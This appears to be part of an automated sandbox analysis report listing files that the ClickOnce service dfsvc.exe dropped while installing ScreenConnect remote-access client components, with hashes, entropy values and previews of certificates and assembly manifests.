                                                                                                                                                                                                                Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0...*.H.............X.Z..hT.F...^.g..n......W.%T.;~.|LU.......aCW...[....-.k.*F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..*1.4.....U.x}n..F....g..|.......P.|...G......:.F.w,....mj.kj>..2=9.*.Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p|5.6....KN..p.6y..\K........:.T.......q.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1428
                                                                                                                                                                                                                Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                                                Entropy (8bit):3.462038329656643
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:kKi8/sJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:6QHkPlE99SCQl2DUevat
                                                                                                                                                                                                                MD5:B448E480AB007872E062444DBC8D9CD9
                                                                                                                                                                                                                SHA1:49174F632FB0AE41DE871B0026FD6E95DACE882F
                                                                                                                                                                                                                SHA-256:3CDE8123A9BCA1B46B4D5D46059E6FFF266C43EEBF2F285C0ADB315A39A2571A
                                                                                                                                                                                                                SHA-512:1A32CBDAB302D985502049FA076575E6ED33F8088775BE2DF6A079CCBFECD3FCE321ECD4D6C7F01F5043CD94A64BE9D326B81FAF393B58DC6F5CEC872C2C496D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:p...... ............y...(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):308
                                                                                                                                                                                                                Entropy (8bit):3.210369268758652
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:kKN+MlFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:dStWOxSW0P3PeXJUZY
                                                                                                                                                                                                                MD5:556FF3DD3A209FB14B08B42DC72D9B27
                                                                                                                                                                                                                SHA1:F13A718592B8E19C8930EB9829D29E5BFD0A18A8
                                                                                                                                                                                                                SHA-256:F86BD9BFF5D20BD4FD6314B4D55BD6A8BDC3300234939F7383864D8959883204
                                                                                                                                                                                                                SHA-512:2EF7070B63ABA1194B9D16DBE485B4BE71CE1D2942AC0511CAF4FE1117188142D2EBA0D9FCC24A390ADFC4BDF59C94AA5CD105F99FE7B1F3A19B81C8F5539FC4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:p...... ........4.......(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):412
                                                                                                                                                                                                                Entropy (8bit):3.9931916737225213
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:kKjsZk5RvN9zEZ5KfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkr:wZiXuUmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                MD5:5F98C70B1D71E56C900AF92551B8B83E
                                                                                                                                                                                                                SHA1:B0197680A8FAE0CE26F9FB22651CA8EE7A13D4F9
                                                                                                                                                                                                                SHA-256:E5801FF0E3171975287042A78B8529169771028D84C6E1423CF66CEF8E2D8175
                                                                                                                                                                                                                SHA-512:6834A473F63E62B4F6A2E8592E6E9BC6B867653DB525BDC90A5530D61D537335509E6561E2375597185762D7BBFBF4F53F6E0436AE93602EB6867B8925645257
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:p...... ....(...s.[[....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:kKcpLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:wLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                MD5:EA93B055B284ADCE7CA11A2B6B9F247C
                                                                                                                                                                                                                SHA1:CF23D63B40B9BF61F5D83844AC6A5F734B34A921
                                                                                                                                                                                                                SHA-256:8AF19A58EDC927030E134BACF86D91F9910DF367CB0827A6FD0BDC96688A5D74
                                                                                                                                                                                                                SHA-512:9831B4214839F684CFD01240BCACE87DA6B338342842CC2B0CB33FE85FD91F61B2CE5846252D4A944339978FB978C8F2720D93735DC064E491A4A1780EB1AB20
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:p...... ....l.....f.....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25496
                                                                                                                                                                                                                Entropy (8bit):5.064257958325849
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Blqv8zGo26tX9DkX9R/QPIBM7YV+++amtU/:Bs0126tX9DkX9R/QPI+0V+++amtm
                                                                                                                                                                                                                MD5:F86795C5144C6F19A6C13A2C746988E7
                                                                                                                                                                                                                SHA1:E297F11A10779FDF9526BA66757A691F8A139D0D
                                                                                                                                                                                                                SHA-256:D95477E702D80AB4777A5E0457414B766DBED6F0592E5FED8F72211C4A885693
                                                                                                                                                                                                                SHA-512:715E692FCB63A6656B585DE2CD538AE93FDCD129D794246E9A092A66EF0C90E58399E66B20C5085306AA79654A6B30CFF5C1232BA631E8CFAF28097F7DAE815E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PcmH..............f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                                Entropy (8bit):4.331951748119848
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:mJ3uWW7vvvieV+WwQXlmL4MckVM8Aw+IhIYX:03OvvvtJUUMckmb9wf
                                                                                                                                                                                                                MD5:C1D32F5DD328ABB3A16B4F7BD7C4B1DB
                                                                                                                                                                                                                SHA1:65458EF5B934613E10970C4DBED7271407A37620
                                                                                                                                                                                                                SHA-256:9E93A542B3E8400F8F8C99BB976091957099E5D2668C8328CFC7E7E0EF600A6A
                                                                                                                                                                                                                SHA-512:6EFC70D99B0ED74851F50353F8CFE2EAA8E9783ABD024BE5CA2BE9639DBEFC040ED93867E262169D6489F4420E5486C647AFB53019CC7FE78E61698BC4A02DB5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PcmH........7....#.A#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                                Entropy (8bit):4.184942727701058
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:yNq6R84uvvvvvvvceV+Ww7mk9O43jYHlIgBXw0vX3WVhwnjIbm:WR84uvvvvvvvTJC9tUHlXBXztjd
                                                                                                                                                                                                                MD5:E4CDDFF61EF846BC4CC51624A4DDE74D
                                                                                                                                                                                                                SHA1:99768FEA980AB925371FD553A33FA0BCAA8940BE
                                                                                                                                                                                                                SHA-256:4B2A4A1793F65C967B20A3F91A49A3E0F2C682B080E9EA83F2E612C5042A1DF3
                                                                                                                                                                                                                SHA-512:F5C1FBDCF45A7F813D848FE7763D1873541125994262074A3DE315A1BCBFB31F937892C064DA6523D6B73849E18F396597AAF907AEC9269995396A2B7287EB49
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PcmH........}.f`...\4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6588
                                                                                                                                                                                                                Entropy (8bit):4.114471933348246
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:kxkvvvvvvvvvvbJwpZ2LRhyl5dVzzaw75:SHccfaI5
                                                                                                                                                                                                                MD5:4CFD025BD18AC5B1008CA6DF148B17FF
                                                                                                                                                                                                                SHA1:884CE1F139531F8D03F84ADCD7BB631C324B0DDD
                                                                                                                                                                                                                SHA-256:CBCF8D15F30B3814B7B301F3D16575F14D06FB3CA774B9241F5825FD644109FA
                                                                                                                                                                                                                SHA-512:51E88A7945F73BD1C531EBA4AFD7BF000EDC0F20B10506AC22D3F406B4ED709F92E0B6A6383C3A6274C3FE179AAAE1E9E89D0E59D834C244DBF937C4BD8ECD67
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PcmH.............{Y~@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3032
                                                                                                                                                                                                                Entropy (8bit):4.8729050934342775
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:jvMQScwvvsgye6S+9oww7g47Jw+f7iI++5dFkEM6Vbjftsnwbb:zXScwvvaeV+WwwnJwOiMRkbortsnEb
                                                                                                                                                                                                                MD5:5ADE6186A5EDF27D1117BE2E5C6D4385
                                                                                                                                                                                                                SHA1:788177AA2F4A9080E12C38A7C95B852C69981080
                                                                                                                                                                                                                SHA-256:FCA8D1BBA634CC9C5A39D3181BCD125571285D246CE62EA0BF0A7A26A2AAFA9C
                                                                                                                                                                                                                SHA-512:72AC2B410B101B2F90A0882723DC5FC974E63A048473B95C4B4352AB508F9735C2527D3187785E2B74C52466396C335528518132D524A1B2A9FF8EA0E9991D96
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PcmH........-.8K................T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):14612
                                                                                                                                                                                                                Entropy (8bit):5.715955315394059
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:IWh4+en9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOx:IWC9qS6VTX9dX9R/QPIBM7YDm
                                                                                                                                                                                                                MD5:3F4D97B3639918382156C3E180CC8BE8
                                                                                                                                                                                                                SHA1:5CE6A8EE647F769B4BEE51CC85AC09663FE7EDD3
                                                                                                                                                                                                                SHA-256:3DCAE570677CA7D25E18A5AC6E2ED19FBC95DC84B8A602E54E167104BC5047F1
                                                                                                                                                                                                                SHA-512:B592218D8F602DB9C2A284DC5D41FCA57998C464DB320B0E273325561843E5662AC520DD751BB45330499234D2CD4BEE6C37CAB967C74BB26D09712EE5C00446
                                                                                                                                                                                                                Malicious:false
